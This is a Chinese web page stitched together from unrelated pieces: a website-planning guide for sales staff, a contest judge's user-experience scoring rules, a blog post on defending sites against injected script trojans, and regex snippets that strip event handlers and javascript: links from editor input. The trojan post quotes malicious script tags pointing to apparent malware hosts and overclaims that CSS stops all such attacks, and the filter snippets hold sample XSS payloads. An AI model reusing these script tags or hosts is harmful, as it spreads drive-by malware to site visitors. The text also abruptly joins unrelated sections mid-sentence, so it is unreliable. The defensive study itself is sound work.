网站规划的流程(3)

二、在规划之中

也许上面说的都是废话，精明的销售人员都会了解清楚以上的情况后才会提出相关的方案：）在了解清楚刚才提到的那些关于人、事、物的基本情况后，就可以真正的开始对网站进行规划了。在规划的过程当中要切实记得以上所了解的情况，准确的判断其中的轻重缓急，以免为别人做了嫁衣裳。

1、写规划的时候不要为了省事而套用原来的或类似的规划方案。很多用户虽然不是电脑高手，但是在看文档的时候格外的仔细，尤其是对电子文件，甚至会去看看你的属性，是谁写的，写个谁的，这样的用户会让人十分恼火，但是他们的做法有无可挑剔。所以，在写规划文案的时候尽量不用原来的文件修改另存。

例如：某企业的IT技术人员总喜欢耍小聪明，显示自己有多么多么高深的本领。而规划文案的创作者又是在套用了以前的文档进行的修改。在绝对大多数的情况下会被这个喜欢耍小聪明的人发现，而他会大肆的和公司的同事去说，他是多么的厉害，而你是如何的哄弄他们，而他又是多么机警的发现了。也许这个时候你已经有了签署好的合同在手了，但依旧会有可能因此而让这些本来是Money的东西化为无有。

2、写规划的时候要全面的考虑问题，要能站在不同的角度、利用不同的方法去思考问题。如同在写规划前需要了解那些事情一般。但在规划前所了解的只是整体网站应用环节中的一部分，他们属于运营者。而同时规划者需要站在技术实施者和一般浏览者两个角度去看问题。

例如：作为运营者，他们关心的是成本、费用、收益，也就是自己想做什么，做想做的要花费多少，花费后自己可以得到什么。因而，对于运营者的规划方法就是让他们能够认为物有所值，这里说的价值不但是网站设计本身的，还有就是在运营过程中多得到的。

作为技术实施者，他们关心的是技术难度、实施过程、最终效果，也就是从技术角度对功能实现的简单或困难程度，实现某功能所需要经过的必然阶段和技术实现后可以呈现在大家面前的最终效果。因而，对于技术实施者的规划方法就是让他们有发挥的空间，对他们存在某些技术挑战，而避免技术实施者因为网站的简单化或者模块化而消极的应对，一旦技术人员消极，那么最终损失的不是用户，而是企业本身。

作为一般浏览者，他们关心的是内容、效果、实用程度，也就是是否有自己需要的东西，是否搭配协调浏览舒适，是否操作简单、方便。因而，对于一般浏览者的规划方法就是让网站结构尽量扁平，可以让用户在最短的时间内了解整个网站所要展现的主要内容。同时，一般的浏览者更关心的是产品和可以得到的服务，而不是什么公司资格、公司介绍之类的东西，因而产品/服务正在逐步的成为各个网站中第一个被介绍给一般浏览者的事物。

3、写规划的时候要把功能和栏目（内容）进行绑定，避免出现功能一个不少但被压缩到了3-5个栏目（内容）中削减费用，或者栏目（内容）一个不少，功能被极力压缩，做了半天没赚头。

例如：某企业做站点就需要企业介绍、企业新闻、产品介绍、联系方式、留言板四个基本单元，如果按照通常的习惯企业介绍、产品介绍、联系方式用静态页面、企业新闻、留言板用动态，很多企业会选择企业新闻使用静态页面，理由是新闻少，没必要用动态。而这个时候就会出现费用问题，如果说一个新闻模块是1000，而改为静态最多也就50元/页，致使原本只有2000-3000的交易变成了1000左右，而后续的服务更是难做，更新页面不会了，要你做，管还是不管？结果都是问题，而且没有后续的单子可做。而如果换个方法，将企业介绍和企业新闻合并还叫企业介绍，其中不但有企业介绍、企业新闻、而且还可以让企业自由发布任何其他信息，如总经理致辞啊，企业结构图啊等等，这样就等于将一个简单的栏目变成了复杂的，可以突出企业的同时突出起领导人物个人形象的，管理者一般就不会轻易的在这样的栏目中开刀了：）1、在接受网易奥运观方站比赛“用户体验评委”的任务之前，我很犹豫。因为“如何量化用户体验”永远是一个不能有精确解答的问题。作一个关于用户体验的评委很难。
用户体验是用户在使用产品/服务过程中建立的主观感受。不同用户的真实体验无法准确模拟。只能通过合适的模拟/实验来简单认识（算不上量化）界定明确的用户群的体验共性。

2、我是对之前参赛情况作了一些了解后才决定接受这个任务。
1) 基本可以为每个参赛作品界定一个明确的用户群 ─ 该参赛队所在高校的同学和老师。
2) 之前参赛作品普遍都在起步阶段，可以通过一些简单的用户体验基础原则和可用性标准，来区分作品的等级。
3) 这件事可以让更多的未来从业者了解和认识用户体验和产品设计。

3、任何产品/品牌的用户体验层次可以这么划分：”有用、能用、易用、友好”
首 先且永远都必须全力考虑“是否对用户有用，有什么用，如何对用户更有用？”；然后要全力让产品“能用。让用户真的可以顺利用上。”；接下来得让产品更加的 “易用。让用户可以更简单的使用”；最后要做到对用户更“友好”（这里的友好不只是视觉友好，还包括文字等一切和产品气质有关的东西），让用户在使用中感 受到愉悦。

4、我的简单评分原则是：
1) 是否对同学/老师有用。
不能一上去让我看到全是什么“娱乐八卦”或者“大波MM”或者满屏幕的抵制XXX。（有人会说同学们想看到的就是这些。但我认为这些只是他们想要的，并不是真正对他们有用的）
2) 是否可以解决最基础的兼容、稳定、速度等问题，做到“能用”。
不支持firefox，加载不流畅，前端代码混乱，速度不稳定，程序经常出错。都是很有问题的。
3) 是否符合简单的设计原则，使用过程是否简单容易。
常见问题：整体混乱没有信息规划，流程复杂，导航不清晰，使用过程不顺畅，整体设计不统一，等。
4) 界面设计是否舒服，展现给我的感觉是否友好。
常见问题：视觉元素过多，多余的视觉效果太多干扰正常内容，文字表达难理解，界面风格不统一，不能很好的把环境跟设计任何起来等
5) 是否有自己的创新，或者有自己的设计风格/特点。有没有可以让我记住的亮点。
6) 和上一次相比是否有进步，进步多大。
7) ..

5、当然，这个评分标准一定是建立在一个最基础的问题之上：参赛者具备基本的职业道德和素养。因为没有基础的职业素养就没有资格参赛。
我不反对且支持使用开源程序（技术开源可以让我们节约更多的社会劳动力），因为技术只是设计的实现手段，就好像产品的一切都是满足用户需求的解决手段。
但对于比赛，我们必须要有自己的原创设计。使用开源程序的时候，不能连表现层也不做任何优化和修改就拿来参赛，这是对于比赛和评委的不尊重，那些东西也根本不能算是你的“答卷”。我只给1分。（当你考试的时候填写了名字交白卷）
如果免费用了别人的开源程序，必须保留其Powered。如果连版权信息都给故意抹去，或者写上你的，这是对整个IT行业尤其是版权所有者的不尊重。我也有充分理由认为你是在蒙评委，让评委以为“这是你的原创”。这样作品的我给0分。
如果拿了别人的网站直接用，不做任何修改，不给留署名（让评委误认为是你的设计），在评委或者观众给出高评价时还不能主动站出来说“其实这不是我们的原创”。我会认为“这就是抄袭”，给负分（给你0分的同时为其他参赛队加分），并要求组织方核实是否需要取消比赛资格。

6、请不要说“抄袭也是需要能力的，怎么能给负分呢？”。这无异于说“作强盗也是需要实力的，怎么能没有社会价值呢？”。

就像我曾经说过的一样：作为一个产品设计从业者，面对“抄袭”应该有自己的“态度”，这是基本的职业素养。
我无权也无力辱骂那些丧心病狂的抄袭者，但我会拒绝使用，拒绝对这种产品的任何推广，并尽可能的抵制他们。更希望原创者们能有自己高质量的设计，让抄袭者看到“不丧 心病狂的抄袭，一样可以堂堂正正的做人”。

真诚的希望看到更多更好的作品出现，看到更多的原创和创新，而不是更多的机械化模仿、拷贝、抄袭、不留版权的转载和复制。对于这次比赛是这样，对于整个互联网行业也是同样的期待。
因为这个比赛其实只是整个IT行业的缩影，虽然他们还只是学生但早已被这个感染…

还是挂马问题，这段时间，我渐渐感到压力，头大，通过QQ或MSN加我的人越来越多，我最近自己的工作本来就忙得不亦乐乎。哎，想想，还是要抽空来来帮帮大家。

　　前不久《一行代码解决iframe挂马（包含服务器端注入、客户端ARP注入等）》得到了很多朋友的认可，这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了，现在流行挂<script>木马，汗了，看了几个网友的网站都被这样了——页面的顶部或底部加上了：

注意，以下地址含有木马，请不要轻易访问：

汗死，一连插入了N个一样的<script>标记。偶的电脑什么补丁都打了，直接访问这个http://%76%63%63%64%2E%63%6E（或直接使用迅雷下载），额~　现形了：

又用迅雷下载http://a.158dm.com/b1.htm这个文件，一看，乱七八糟的JS编码，汗，不过找到了一个类似QQ号的数字，直接加加看，汗，然后是专业提供网马的组织，哎，什么世道。还收费蛮高滴呢！

针对上面的情况，我也不能白白瞧着不管，想想办法吧，兄弟。喝了碗绿豆粥，糖放得蛮多的，好喝。办法想到了。稍微分析就得出了答案。大家来看看，<script>木马的特点是什么：

<script src=http://%76%63%63%64%2E%63%6E></script>

对了，script木马的src一般都是外域的，也就是src是以http打头的，如果是自己网站的script一般都不用加上http；再看看木马的原形，里面还是输出的iframe、JS代码或是其他<object>代码，不管这么多，来多少杀多少。

来跟我写CSS，一一搞定它们,我写了5种不同的方案，大家来测试一下哈：

解决方案１：

原理：将<script>标记的src拿出来转为小写，再看是不是以“http”开头的外域JS脚本文件，如果是，则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
　　　　缺点：访客无法看到被感染了<script>木马的页面。
     

解决方案２：

原理：将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完，只有部分被强制缓存输出了，剩下的不会再写了。


解决方案３：

　原理：同到外域的JS文件，立即调用IE私有的execCommand方法来停止页面所有请求，所以接下来的外域JS文件也被强制停止下载了。就像我们点了浏览器的“停止”按钮一样。看来这是JS模拟IE停止按钮的一种方法。

解决方案４：

　　　原理：将外域的JS文件的src重写成本地IE404错误页面的地址，这样，外域的JS代码不会下载。

解决方案5：

　　　第五种方案的页面HTML源代码<script>中要加入以"lh"为前缀的id，如lhWeatherJSapi，<script src="***/**.js" id="lhSearchJSapi"></script>　

以下页面代码里含有一个木马地址，而且木马在页面里重复了6次，大家分别用我上面的不同方案测试一下，看看我的研究如何！（此测试有一定的危险性，请务必打好所有补丁再测试）

其中1.js是自己本站的：

我的测试环境是：
　　Windows XP SP2 和windows Vista SP1
      IE6/IE7/IE8
      已全部打好补丁。
综上所述，所有目前的挂马方式全都破解了，用CSS就可以解决所有木马问题，访客不会再轻易地中毒了。

    大家也要仔细研究一下，看看我的代码有什么BUG，有的话一定要拿出来讨论，好解决问题！或是各位有其他更好的办法可以拿出来讨论一下。

过滤所见所得编辑器里的危险脚本

<textarea id="bug" cols="80" rows="5">
<a onclick="test();
test1()"  onblur=
"test3()">test</a>
</textarea>
<button id="kick">抓虫2</button>
<script>
function kickBug(str) {
  return str.replace(/<[a-z][^>]+/ig,
           function($0,$1){
              return $0.replace(/\s*on[a-z]+\s*=\s*("[^"]+"|'[^']+'|[^\s]+)\s*/ig,"");
           }
  );
}
HTMLElement.prototype.__defineGetter__("innerText",function(){
 return this.textContent;
});
HTMLElement.prototype.__defineSetter__("innerText",function(text){
 this.textContent = text;
});
document.getElementById("kick").onclick = function() {
  var bug = document.getElementById("bug");
  bug.innerText = kickBug(bug.innerText);
}
</script>

<textarea id="bug" cols="80" rows="5">
<a onclick="test();" href="
javascript:alert('a')" href="javascript:"
href="vbscript:alert()"
>test</a>
</textarea>
<button id="kick">抓虫3</button>
<script>
function kickBug(str) {
  return str.replace(/<[a-z][^>]+/ig,
           function($0,$1){
              return $0.replace(/\s*(href|src)\s*=\s*("\s*(javascript|vbscript):[^"]+"|'\s*(javascript|vbscript):[^']+'|(javascript|vbscript):[^\s]+)/ig,"");
           }
  );
}
HTMLElement.prototype.__defineGetter__("innerText",function(){
 return this.textContent;
});
HTMLElement.prototype.__defineSetter__("innerText",function(text){
 this.textContent = text;
});
document.getElementById("kick").onclick = function() {
  var bug = document.getElementById("bug");
  bug.innerText = kickBug(bug.innerText);
}
</script>